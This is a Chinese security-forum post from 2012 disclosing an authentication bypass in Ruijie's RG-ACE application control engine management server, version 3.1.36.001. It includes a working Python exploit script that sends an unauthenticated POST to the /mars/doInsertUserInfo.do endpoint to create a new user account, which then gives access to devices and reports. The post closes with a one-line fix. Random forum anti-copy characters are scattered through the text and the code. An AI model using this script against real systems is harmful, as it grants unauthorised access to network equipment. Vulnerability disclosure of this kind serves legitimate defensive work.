找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 锐捷应用控制引擎管理服务器可以增加用户
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2083|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)/ |) i- i! ~1 i) ^- p# C- `
$ W2 r3 H2 ?8 X2 E
( N" I, C$ F& f. ^; r2 e
测试的具体版本是( @# z' E- ]* z6 C
产品名称: 锐捷应用控制引擎
! }4 S- W5 I4 g' b& b" m4 U版本号: 3.1.36.001 TC
/ M" ]: `! Y8 g" l& u$ O编译时间: 2011042917305 i+ `" x: g4 D& B+ M
, {9 B) w+ F+ s/ s

, P8 G( G5 D3 l5 ?) |8 z漏洞证明:
7 S- E9 ?2 V  d" s7 c5 d 3 x8 H0 I7 V: [/ @
) v5 R: E: g  U7 ~8 y# j% y5 A! h

9 }! b1 s) K7 k" I7 P; t( Q% E& m1 E1 o& n  G5 c, s

! ^, D. |/ Y8 ~2 b2 k; H) T6 f7 D: q/ v' W3 \& t! E
执行脚本
; G& E2 u- n) p1 e1 v5 q4 s#! /usr/bin/env python8 K' N& K* u+ N# z" Z
#coding=gbk
6 I8 y# @  Y& _#RG-ACE管理服务器 V3.1.36.001
' ]) k6 {$ J! ?- r0 _! }& `; ^import urllib2, urllib,cookielib
. k4 G7 \8 X! R% a2 m) V) iurl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP8 J9 N8 `9 X* \8 _( @" m
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))  }) z2 |3 T; s) g0 q8 S
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]( l7 R4 }/ h8 C* `8 Y8 `' u! @/ d
post=(("event","userManager.doInsertUserInfo"),
( _9 ~7 }* `* `8 V; u- }("useractionname","addButtonValue"),) b# O- \- f" d
("useropermanager","userManager"),9 S6 F) X& K# `6 X( i$ `/ n( O
("userName","t"), #######账号自己加
) W/ u) m2 a: b("pwd","aaaaaa"),######密码自己加9 g; c1 L6 m" P) {6 j; L0 ?, P
("trueName","ad"),$ A3 K0 P" W! L
("email",""),- v9 X  n1 f% V6 ^. a! N
("mobilePhone",""),
! }- u2 T% ^* t1 J1 Z+ R2 X("officePhone",""),
7 d0 L, a& M" l- o("addr",""),2 a8 o) J7 |2 a+ Y4 T& C
("submit","确定"))5 R5 \* b# m9 |8 `* q2 r- e' r
urllib2.install_opener(opener)4 a5 z' b9 v3 K
p=urllib2.urlopen(url, urllib.urlencode(post)).read(), E- Y1 [/ m( i8 {
print "Done": \3 n, Z3 c6 J' v

6 c& P1 Z+ E2 T登录,连接设备
; o; Z  X# i7 X- e
  o  Y5 L5 U- P) a& |) u
' p0 D# q  v4 \% z( z, |0 u+ o/ g  i3 }: k, |6 X

3 |5 w2 z0 G7 g0 U) u3 R& O1 p$ L8 X2 F$ S/ j6 _
默认的管理员admin权限更大点
# J- L# F6 S$ q& k6 y" f! I1 N4 Z% z- H$ f! f7 y. {# d* q' a, x
. O$ _, A2 [' E! y' _( U- e4 [

- V5 Q& z$ X( c! {" A" ~( _ ' _- r6 V$ }: S- P) N' n3 S0 h
2 e: _7 z: S. ^2 ]
修复方案:; |- s7 B3 y& \% x& e3 J: ^5 z
加强对接口的权限验证
1 A  T: U5 ?+ g2 M" s$ {' e: T$ _; `% p0 ?: v
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表